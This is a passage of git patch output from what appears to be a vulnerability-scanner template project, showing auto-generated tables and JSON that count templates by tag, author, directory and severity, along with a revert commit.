vsftpd | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| actuator | 1 | | | | | | | | | -| autocomplete | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| luftguitar | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| manager | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| graph | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| mod-proxy | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| calendly | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| gurock | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| mapbox | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| weather | 1 | | | | | | | | | | springframework | 1 | | | | | | | | | -| gunicorn | 1 | | | | | | | | | -| gitea | 1 | | | | | | | | | -| placeos | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| geocode | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| route | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| stripe | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| glowroot | 1 | | | | | | | | | -| sendgrid | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| newrelic | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| cve202 | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | | werkzeug | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| elevation | 1 | | | | | | | | | -| syslog | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| mailgun | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | | codemeter | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index e941b1bca2..17c9c10e8a 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | -| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | -| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| cve | 828 | daffainfo | 288 | cves | 832 | info | 749 | http | 2205 | +| lfi | 340 | pikpikcu | 280 | vulnerabilities | 327 | high | 645 | file | 50 | +| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 269 | medium | 474 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | +| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 140 | | | | | | rce | 212 | gy741 | 81 | takeovers | 65 | | | | | | tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | +| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 164 | madrobot | 63 | file | 50 | | | | | From 02722c2334584a27ee2a40e6e7efa1f84d1ad802 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 17 Oct 2021 16:11:00 +0000 Subject: [PATCH 2985/4083] Auto README Update [Sun Oct 17 16:11:00 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 30671a0e64..e60fe58f03 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 164 | madrobot | 63 | file | 50 | | | | | -**175 directories, 2366 files**. +**176 directories, 2376 files**. From 00e16b3e90d830ab9ac3bf6d611181bb12a764b4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 18 Oct 2021 02:50:18 +0530 Subject: [PATCH 2986/4083] Revert "Auto Generated Templates Stats [Sun Oct 17 16:10:43 UTC 2021] :robot:" This reverts commit 5a0b62b8f574ffcc9fee72afa5b71b3ec4b7a141. --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1770 +++++++++++++++++++++--------------------- TOP-10.md | 12 +- 3 files changed, 892 insertions(+), 892 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index b3ed1986da..4bed7d43d2 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":828},{"name":"lfi","count":340},{"name":"panel","count":272},{"name":"xss","count":258},{"name":"wordpress","count":252},{"name":"exposure","count":239},{"name":"rce","count":212},{"name":"tech","count":195},{"name":"wp-plugin","count":175},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":88},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"iot","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"redirect","count":37},{"name":"cve2016","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":29},{"name":"jira","count":29},{"name":"cve2015","count":29},{"name":"cisco","count":27},{"name":"cve2014","count":27},{"name":"listing","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"router","count":21},{"name":"misconfig","count":21},{"name":"aem","count":19},{"name":"sap","count":18},{"name":"cve2012","count":18},{"name":"springboot","count":18},{"name":"debug","count":18},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"devops","count":15},{"name":"weblogic","count":14},{"name":"fuzz","count":14},{"name":"struts","count":14},{"name":"login","count":14},{"name":"cve2009","count":14},{"name":"aws","count":14},{"name":"adobe","count":13},{"name":"zoho","count":13},{"name":"deserialization","count":13},{"name":"dns","count":13},{"name":"android","count":13},{"name":"wp-theme","count":12},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"magento","count":11},{"name":"cve2013","count":11},{"name":"hp","count":10},{"name":"xxe","count":10},{"name":"intrusive","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"kubernetes","count":9},{"name":"cve2008","count":8},{"name":"fastjson","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"microsoft","count":8},{"name":"nginx","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"scada","count":8},{"name":"backup","count":8},{"name":"ibm","count":8},{"name":"files","count":7},{"name":"confluence","count":7},{"name":"cms","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"phpmyadmin","count":6},{"name":"jetty","count":6},{"name":"nodejs","count":6},{"name":"citrix","count":6},{"name":"drupal","count":6},{"name":"lucee","count":6},{"name":"solr","count":6},{"name":"fileupload","count":6},{"name":"rconfig","count":6},{"name":"django","count":6},{"name":"docker","count":6},{"name":"camera","count":6},{"name":"api","count":6},{"name":"laravel","count":6},{"name":"dedecms","count":5},{"name":"circarlife","count":5},{"name":"tomcat","count":5},{"name":"crlf","count":5},{"name":"printer","count":5},{"name":"java","count":5},{"name":"ssti","count":5},{"name":"jolokia","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"iis","count":5},{"name":"maps","count":4},{"name":"samsung","count":4},{"name":"asp","count":4},{"name":"vpn","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"symantec","count":4},{"name":"glpi","count":4},{"name":"magmi","count":4},{"name":"thinkphp","count":4},{"name":"strapi","count":4},{"name":"git","count":4},{"name":"npm","count":4},{"name":"slack","count":4},{"name":"zabbix","count":4},{"name":"zimbra","count":4},{"name":"fatpipe","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"proxy","count":4},{"name":"symfony","count":4},{"name":"firebase","count":4},{"name":"amazon","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"wso2","count":4},{"name":"moodle","count":4},{"name":"resin","count":4},{"name":"rfi","count":4},{"name":"exchange","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"nacos","count":3},{"name":"lansweeper","count":3},{"name":"linkerd","count":3},{"name":"tikiwiki","count":3},{"name":"github","count":3},{"name":"mail","count":3},{"name":"vbulletin","count":3},{"name":"kafka","count":3},{"name":"ebs","count":3},{"name":"terramaster","count":3},{"name":"targa","count":3},{"name":"mongodb","count":3},{"name":"cve2007","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"jeesns","count":3},{"name":"prometheus","count":3},{"name":"caucho","count":3},{"name":"fanruan","count":3},{"name":"bitrix","count":3},{"name":"exposures","count":3},{"name":"kibana","count":3},{"name":"oa","count":3},{"name":"zhiyuan","count":3},{"name":"fpd","count":3},{"name":"openssh","count":3},{"name":"r-seenet","count":3},{"name":"node","count":3},{"name":"cves","count":3},{"name":"telerik","count":3},{"name":"nosqli","count":3},{"name":"openam","count":3},{"name":"druid","count":3},{"name":"backdoor","count":3},{"name":"smtp","count":3},{"name":"azure","count":3},{"name":"httpd","count":3},{"name":"bigip","count":3},{"name":"injection","count":3},{"name":"ssh","count":3},{"name":"ofbiz","count":3},{"name":"cacti","count":3},{"name":"kevinlab","count":3},{"name":"search","count":3},{"name":"opensis","count":3},{"name":"itop","count":3},{"name":"hoteldruid","count":3},{"name":"springcloud","count":3},{"name":"jellyfin","count":3},{"name":"nexus","count":3},{"name":"log","count":3},{"name":"cloud","count":3},{"name":"ilo","count":2},{"name":"prtg","count":2},{"name":"bruteforce","count":2},{"name":"vrealize","count":2},{"name":"embed","count":2},{"name":"harbor","count":2},{"name":"xxljob","count":2},{"name":"ec2","count":2},{"name":"guacamole","count":2},{"name":"places","count":2},{"name":"kong","count":2},{"name":"axis2","count":2},{"name":"fortios","count":2},{"name":"flir","count":2},{"name":"emerge","count":2},{"name":"electron","count":2},{"name":"wordfence","count":2},{"name":"waf","count":2},{"name":"rancher","count":2},{"name":"service","count":2},{"name":"smb","count":2},{"name":"db","count":2},{"name":"nagios","count":2},{"name":"prestashop","count":2},{"name":"qcubed","count":2},{"name":"leak","count":2},{"name":"oauth","count":2},{"name":"openvpn","count":2},{"name":"glassfish","count":2},{"name":"phpcollab","count":2},{"name":"seeyon","count":2},{"name":"upload","count":2},{"name":"netis","count":2},{"name":"yapi","count":2},{"name":"showdoc","count":2},{"name":"totemomail","count":2},{"name":"cache","count":2},{"name":"kentico","count":2},{"name":"grav","count":2},{"name":"frp","count":2},{"name":"lotus","count":2},{"name":"getsimple","count":2},{"name":"saltstack","count":2},{"name":"bucket","count":2},{"name":"linux","count":2},{"name":"ucmdb","count":2},{"name":"dos","count":2},{"name":"chiyu","count":2},{"name":"trixbox","count":2},{"name":"yii","count":2},{"name":"geowebserver","count":2},{"name":"aruba","count":2},{"name":"jsf","count":2},{"name":"icewarp","count":2},{"name":"minio","count":2},{"name":"splunk","count":2},{"name":"hpe","count":2},{"name":"rstudio","count":2},{"name":"s3","count":2},{"name":"huawei","count":2},{"name":"bypass","count":2},{"name":"nextjs","count":2},{"name":"middleware","count":2},{"name":"akkadian","count":2},{"name":"sharepoint","count":2},{"name":"mida","count":2},{"name":"status","count":2},{"name":"horde","count":2},{"name":"mcafee","count":2},{"name":"jboss","count":2},{"name":"voipmonitor","count":2},{"name":"mailchimp","count":2},{"name":"backups","count":2},{"name":"commax","count":2},{"name":"hostheader-injection","count":2},{"name":"idrac","count":2},{"name":"keycloak","count":2},{"name":"couchdb","count":2},{"name":"pega","count":2},{"name":"hashicorp","count":2},{"name":"odoo","count":2},{"name":"heroku","count":2},{"name":"chyrp","count":2},{"name":"hjtcloud","count":2},{"name":"sonarqube","count":2},{"name":"natshell","count":2},{"name":"qihang","count":2},{"name":"justwriting","count":2},{"name":"wuzhicms","count":2},{"name":"activemq","count":2},{"name":"sonicwall","count":2},{"name":"adminer","count":2},{"name":"ecoa","count":2},{"name":"text","count":2},{"name":"liferay","count":2},{"name":"aviatrix","count":2},{"name":"netsweeper","count":2},{"name":"maian","count":2},{"name":"vcenter","count":2},{"name":"paloalto","count":2},{"name":"tidb","count":2},{"name":"avantfax","count":2},{"name":"shellshock","count":2},{"name":"sitecore","count":2},{"name":"storage","count":2},{"name":"ecology","count":2},{"name":"cve2005","count":2},{"name":"akamai","count":2},{"name":"globalprotect","count":2},{"name":"enumeration","count":2},{"name":"jeedom","count":2},{"name":"spark","count":2},{"name":"favicon","count":2},{"name":"chamilo","count":2},{"name":"openfire","count":2},{"name":"payara","count":2},{"name":"dolibarr","count":2},{"name":"nextcloud","count":2},{"name":"rockmongo","count":2},{"name":"axis","count":2},{"name":"bitly","count":2},{"name":"hasura","count":2},{"name":"plesk","count":2},{"name":"webcam","count":2},{"name":"igs","count":2},{"name":"cocoon","count":1},{"name":"ns","count":1},{"name":"gogs","count":1},{"name":"rmi","count":1},{"name":"csrfguard","count":1},{"name":"lg-nas","count":1},{"name":"nomad","count":1},{"name":"domxss","count":1},{"name":"geocode","count":1},{"name":"esmtp","count":1},{"name":"bookstack","count":1},{"name":"limit","count":1},{"name":"linkedin","count":1},{"name":"fiori","count":1},{"name":"eg","count":1},{"name":"mobileiron","count":1},{"name":"cse","count":1},{"name":"geddy","count":1},{"name":"rhymix","count":1},{"name":"lanproxy","count":1},{"name":"hortonworks","count":1},{"name":"rockethchat","count":1},{"name":"opensmtpd","count":1},{"name":"rdp","count":1},{"name":"sentry","count":1},{"name":"testrail","count":1},{"name":"clusterengine","count":1},{"name":"seacms","count":1},{"name":"vnc","count":1},{"name":"craftcms","count":1},{"name":"ulterius","count":1},{"name":"bigbluebutton","count":1},{"name":"checkpoint","count":1},{"name":"dvwa","count":1},{"name":"fortilogger","count":1},{"name":"timesheet","count":1},{"name":"codeigniter","count":1},{"name":"aspnuke","count":1},{"name":"key","count":1},{"name":"redwood","count":1},{"name":"office365","count":1},{"name":"ruby","count":1},{"name":"wavemaker","count":1},{"name":"instagram","count":1},{"name":"ghost","count":1},{"name":"jquery","count":1},{"name":"fastcgi","count":1},{"name":"netdata","count":1},{"name":"mailgun","count":1},{"name":"blackboard","count":1},{"name":"zenario","count":1},{"name":"dotclear","count":1},{"name":"htmli","count":1},{"name":"bolt","count":1},{"name":"rsyncd","count":1},{"name":"maccmsv10","count":1},{"name":"parentlink","count":1},{"name":"eprints","count":1},{"name":"phpfastcache","count":1},{"name":"mara","count":1},{"name":"jeewms","count":1},{"name":"bing","count":1},{"name":"nps","count":1},{"name":"zms","count":1},{"name":"h3c-imc","count":1},{"name":"rabbitmq","count":1},{"name":"spotify","count":1},{"name":"comodo","count":1},{"name":"scimono","count":1},{"name":"directions","count":1},{"name":"panabit","count":1},{"name":"javascript","count":1},{"name":"octobercms","count":1},{"name":"erp-nc","count":1},{"name":"nifi","count":1},{"name":"twitter-server","count":1},{"name":"grails","count":1},{"name":"whm","count":1},{"name":"jnoj","count":1},{"name":"empirecms","count":1},{"name":"gunicorn","count":1},{"name":"solman","count":1},{"name":"tensorboard","count":1},{"name":"lotuscms","count":1},{"name":"timeclock","count":1},{"name":"iterable","count":1},{"name":"route","count":1},{"name":"74cms","count":1},{"name":"mkdocs","count":1},{"name":"auth","count":1},{"name":"weather","count":1},{"name":"owa","count":1},{"name":"elascticsearch","count":1},{"name":"tcexam","count":1},{"name":"etherpad","count":1},{"name":"cofax","count":1},{"name":"cherokee","count":1},{"name":"pagespeed","count":1},{"name":"netmask","count":1},{"name":"jitsi","count":1},{"name":"lighttpd","count":1},{"name":"pihole","count":1},{"name":"monitorix","count":1},{"name":"ems","count":1},{"name":"websphere","count":1},{"name":"gitlist","count":1},{"name":"gespage","count":1},{"name":"rubedo","count":1},{"name":"soar","count":1},{"name":"wifisky","count":1},{"name":"javafaces","count":1},{"name":"resourcespace","count":1},{"name":"stripe","count":1},{"name":"myucms","count":1},{"name":"phalcon","count":1},{"name":"tor","count":1},{"name":"robomongo","count":1},{"name":"sophos","count":1},{"name":"miscrsoft","count":1},{"name":"oscommerce","count":1},{"name":"alibaba","count":1},{"name":"glances","count":1},{"name":"ueditor","count":1},{"name":"werkzeug","count":1},{"name":"acontent","count":1},{"name":"nordex","count":1},{"name":"twitter","count":1},{"name":"secmail","count":1},{"name":"contentkeeper","count":1},{"name":"expn","count":1},{"name":"autocomplete","count":1},{"name":"sprintful","count":1},{"name":"smartsense","count":1},{"name":"travis","count":1},{"name":"dropbox","count":1},{"name":"distance","count":1},{"name":"nsasg","count":1},{"name":"webmin","count":1},{"name":"realteo","count":1},{"name":"youtube","count":1},{"name":"avalanche","count":1},{"name":"gurock","count":1},{"name":"sidekiq","count":1},{"name":"avtech","count":1},{"name":"spidercontrol","count":1},{"name":"ecom","count":1},{"name":"luftguitar","count":1},{"name":"graph","count":1},{"name":"sco","count":1},{"name":"pacsone","count":1},{"name":"wondercms","count":1},{"name":"xvr","count":1},{"name":"clickhouse","count":1},{"name":"shoretel","count":1},{"name":"mariadb","count":1},{"name":"mirai","count":1},{"name":"olivetti","count":1},{"name":"mongoshake","count":1},{"name":"place","count":1},{"name":"spectracom","count":1},{"name":"goahead","count":1},{"name":"graphite","count":1},{"name":"plc","count":1},{"name":"phpfusion","count":1},{"name":"matrix","count":1},{"name":"moinmoin","count":1},{"name":"shoppable","count":1},{"name":"circleci","count":1},{"name":"nedi","count":1},{"name":"gilacms","count":1},{"name":"motorola","count":1},{"name":"acexy","count":1},{"name":"square","count":1},{"name":"expressjs","count":1},{"name":"fortiweb","count":1},{"name":"kindeditor","count":1},{"name":"discord","count":1},{"name":"package","count":1},{"name":"tugboat","count":1},{"name":"exacqvision","count":1},{"name":"biometrics","count":1},{"name":"opencast","count":1},{"name":"burp","count":1},{"name":"portainer","count":1},{"name":"livezilla","count":1},{"name":"feifeicms","count":1},{"name":"sourcebans","count":1},{"name":"email","count":1},{"name":"openemr","count":1},{"name":"jaspersoft","count":1},{"name":"appweb","count":1},{"name":"kubeflow","count":1},{"name":"aura","count":1},{"name":"wamp","count":1},{"name":"adb","count":1},{"name":"starttls","count":1},{"name":"smi","count":1},{"name":"glowroot","count":1},{"name":"axiom","count":1},{"name":"linksys","count":1},{"name":"zyxel","count":1},{"name":"visionhub","count":1},{"name":"powercreator","count":1},{"name":"springframework","count":1},{"name":"mrtg","count":1},{"name":"loqate","count":1},{"name":"weglot","count":1},{"name":"postmark","count":1},{"name":"saltapi","count":1},{"name":"argussurveillance","count":1},{"name":"fortigates","count":1},{"name":"elfinder","count":1},{"name":"hadoop","count":1},{"name":"concrete","count":1},{"name":"circle","count":1},{"name":"stem","count":1},{"name":"sar2html","count":1},{"name":"upnp","count":1},{"name":"acme","count":1},{"name":"phpunit","count":1},{"name":"beanstalk","count":1},{"name":"xmlchart","count":1},{"name":"woocomernce","count":1},{"name":"wavlink","count":1},{"name":"nexusdb","count":1},{"name":"pyramid","count":1},{"name":"ipstack","count":1},{"name":"rocketchat","count":1},{"name":"fedora","count":1},{"name":"nuuo","count":1},{"name":"crm","count":1},{"name":"mapbox","count":1},{"name":"arl","count":1},{"name":"api-manager","count":1},{"name":"redhat","count":1},{"name":"redcap","count":1},{"name":"mdb","count":1},{"name":"spf","count":1},{"name":"panasonic","count":1},{"name":"details","count":1},{"name":"database","count":1},{"name":"pmb","count":1},{"name":"actuator","count":1},{"name":"cyberoam","count":1},{"name":"beanshell","count":1},{"name":"pcoip","count":1},{"name":"webmodule-ee","count":1},{"name":"thinkadmin","count":1},{"name":"opensns","count":1},{"name":"kafdrop","count":1},{"name":"tjws","count":1},{"name":"yachtcontrol","count":1},{"name":"xdcms","count":1},{"name":"circontrorl","count":1},{"name":"razor","count":1},{"name":"setup","count":1},{"name":"addpac","count":1},{"name":"eyou","count":1},{"name":"alerta","count":1},{"name":"emby","count":1},{"name":"kyan","count":1},{"name":"geolocation","count":1},{"name":"qsan","count":1},{"name":"cves2001","count":1},{"name":"keenetic","count":1},{"name":"zookeeper","count":1},{"name":"hiawatha","count":1},{"name":"apiman","count":1},{"name":"roads","count":1},{"name":"dotnet","count":1},{"name":"svn","count":1},{"name":"sureline","count":1},{"name":"calendarix","count":1},{"name":"webadmin","count":1},{"name":"netrc","count":1},{"name":"processmaker","count":1},{"name":"influxdb","count":1},{"name":"jmx","count":1},{"name":"cors","count":1},{"name":"visualstudio","count":1},{"name":"streetview","count":1},{"name":"accela","count":1},{"name":"karel","count":1},{"name":"panos","count":1},{"name":"mediumish","count":1},{"name":"anchorcms","count":1},{"name":"wing-ftp","count":1},{"name":"phpinfo"